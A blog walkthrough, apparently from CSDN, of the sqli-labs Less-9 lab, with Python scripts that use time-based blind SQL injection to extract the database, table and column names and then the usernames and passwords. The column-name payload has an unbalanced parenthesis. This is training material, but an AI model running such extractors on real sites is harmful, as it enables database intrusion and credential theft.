• SQL注入实例(sqli-labs/less-9)


    0、初始页面

    1、爆库名

    使用python脚本

    1. def inject_database1(url):
    2. name = ''
    3. for i in range(1, 20):
    4. low = 32
    5. high = 128
    6. mid = (low + high) // 2
    7. while low < high:
    8. payload = "1' and if(ascii(substr(database(),%d,1)) > %d ,sleep(2),0)-- " % (i, mid)
    9. res = {"id": payload}
    10. start_time = time.time()
    11. r = requests.get(url, params=res)
    12. end_time = time.time()
    13. if end_time - start_time >= 2:
    14. low = mid + 1
    15. else:
    16. high = mid
    17. mid = (low + high) // 2
    18. if mid == 32:
    19. break
    20. name = name + chr(mid)
    21. print(name)
    22. inject_database1(url)

    2、爆表名

    使用python脚本

    1. def inject_database1(url):
    2. name = ''
    3. for i in range(1, 20):
    4. low = 32
    5. high = 128
    6. mid = (low + high) // 2
    7. while low < high:
    8. payload = "1' and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),%d,1)) > %d ,sleep(1),0)-- " % (i, mid)
    9. res = {"id": payload}
    10. start_time = time.time()
    11. r = requests.get(url, params=res)
    12. end_time = time.time()
    13. if end_time - start_time >= 1:
    14. low = mid + 1
    15. else:
    16. high = mid
    17. mid = (low + high) // 2
    18. if mid == 32:
    19. break
    20. name = name + chr(mid)
    21. print(name)
    22. inject_database1(url)

    3、爆列名

    使用python脚本

    1. def inject_database1(url):
    2. name = ''
    3. for i in range(1, 20):
    4. low = 32
    5. high = 128
    6. mid = (low + high) // 2
    7. while low < high:
    8. payload = "1' and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),%d,1) > %d ,sleep(1),0)-- " % (i, mid)
    9. res = {"id": payload}
    10. start_time = time.time()
    11. r = requests.get(url, params=res)
    12. end_time = time.time()
    13. if end_time - start_time >= 1:
    14. low = mid + 1
    15. else:
    16. high = mid
    17. mid = (low + high) // 2
    18. if mid == 32:
    19. break
    20. name = name + chr(mid)
    21. print(name)
    22. inject_database1(url)

    4、显示最终目的

    使用python脚本

    1. def inject_database1(url):
    2. name = ''
    3. for i in range(1, 20):
    4. low = 32
    5. high = 128
    6. mid = (low + high) // 2
    7. while low < high:
    8. payload = "1' and if(ascii(substr((select group_concat(username,0x3a,password) from users),%d,1)) > %d ,sleep(1),0)-- " % (i, mid)
    9. res = {"id": payload}
    10. start_time = time.time()
    11. r = requests.get(url, params=res)
    12. end_time = time.time()
    13. if end_time - start_time >= 1:
    14. low = mid + 1
    15. else:
    16. high = mid
    17. mid = (low + high) // 2
    18. if mid == 32:
    19. break
    20. name = name + chr(mid)
    21. print(name)

  • 相关阅读:
    Mygin实现中间件Middleware
    Java开发注意事项和细节说明
    Java面试题总结
    SystemC学习(2)— D触发器的建模与测试
    GBase 8c导出表参数说明
    tsp学习
    FANUC机器人实现本地自动运行的相关配置和参数设置
    园子周边第3季—设计初稿预览:2024夏天穿上博客园T恤 show your code
    xsrc腾讯应急响应中心部署全网最详细教程
    力扣(LeetCode)11. 盛最多水的容器(C++)
  • 原文地址:https://blog.csdn.net/Thewei666/article/details/140937624